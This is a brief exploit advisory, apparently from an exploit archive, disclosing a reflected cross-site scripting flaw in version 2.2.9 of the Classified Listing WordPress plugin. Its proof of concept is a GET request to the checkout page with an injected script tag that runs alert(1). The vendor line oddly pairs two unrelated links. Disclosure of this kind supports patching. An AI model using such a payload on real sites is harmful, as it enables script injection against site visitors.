Authored by AsCiI

Classified Listing version 2.2.9 suffers from a cross site scripting vulnerability.

# Exploit Title: Classified Listing – Classified ads & Business
Directory Plugin - Cross site scripting
# Date: 29.06.2022
# Exploit Author: ASCII
# Vendor Homepage: https://www.radiustheme.com/ <https://webim.ru/>
# Version: 2.2.9
# Tested on: 2.2.9



Classified Listing – Classified ads & Business Directory Plugin -
Cross site scripting

POC

GET /checkout/?wq3lu</script><script>alert(1)</script>cvqv5=1

as a result you'll see the same picture:

https://ibb.co/bgCTNsb